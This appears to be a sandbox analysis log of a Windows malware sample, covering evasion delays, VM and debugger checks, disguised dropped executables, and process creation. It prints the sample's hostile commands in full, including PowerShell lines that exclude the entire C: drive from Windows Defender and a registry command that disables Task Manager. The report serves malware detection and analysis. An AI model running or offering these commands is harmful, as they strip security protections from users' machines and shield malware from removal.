                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8932Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8512Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8272Thread sleep count: 1366 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8980Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8756Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8276Thread sleep count: 1364 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8988Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8812Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8340Thread sleep count: 1393 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8840Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8524Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8320Thread sleep count: 976 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8976Thread sleep time: -11068046444225724s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8776Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8328Thread sleep count: 1417 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8940Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8364Thread sleep count: 899 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8860Thread sleep time: -11068046444225724s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8588Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe TID: 9040Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe TID: 9204Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\Default\Documents\sihost.exe TID: 8864Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\Default\Documents\sihost.exe TID: 8520Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe TID: 8540Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\Default\Documents\sihost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\Default\Documents\sihost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001EA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_001EA69B
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001FC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_001FC220
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001FE6A3 VirtualQuery,GetSystemInfo,0_2_001FE6A3
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeThread delayed: delay time: 922337203685477
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\Default\Documents\sihost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\Default\Documents\sihost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeThread delayed: delay time: 922337203685477
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                        Source: wscript.exe, 00000001.00000003.1942576110.0000000002CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: ComComponentDriverInto.exe, 00000008.00000002.2284157665.000000001BCE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\b
                        Source: wscript.exe, 00000001.00000003.1942576110.0000000002CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                        Source: wscript.exe, 00000001.00000002.1943696350.0000000002D0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&
                        Source: wscript.exe, 00000001.00000002.1943696350.0000000002D0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\SysWOW64\netutils.dllCVMWar&Prod_VMware_SATA_CD00#4&224f42ef
                        Source: w32tm.exe, 0000004F.00000002.2132525610.000001EE27560000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeAPI call chain: ExitProcess graph end nodegraph_0-23873
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001FF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001FF838
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_00207DEE mov eax, dword ptr fs:[00000030h]0_2_00207DEE
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_0020C030 GetProcessHeap,0_2_0020C030
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeProcess token adjusted: Debug
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeProcess token adjusted: Debug
                        Source: C:\Users\Default\Documents\sihost.exeProcess token adjusted: Debug
                        Source: C:\Users\Default\Documents\sihost.exeProcess token adjusted: Debug
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001FF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001FF838
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001FF9D5 SetUnhandledExceptionFilter,0_2_001FF9D5
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001FFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_001FFBCA
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_00208EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00208EBD
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontdriversavescrt/'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\WmiPrvSE.exe'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Documents\sihost.exe'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\ComComponentDriverInto.exe'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontdriversavescrt/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\WmiPrvSE.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Documents\sihost.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\ComComponentDriverInto.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\VC6VnT3ED3x5xNRNDrSFzjvQXKeB6kXLUZIf41P3hi0I8ZK.vbe" Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\fontdriversavescrt\EgkshvK6qarKZkry.bat" "Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\fontdriversavescrt\ComComponentDriverInto.exe "C:\fontdriversavescrt/ComComponentDriverInto.exe"Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline"Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
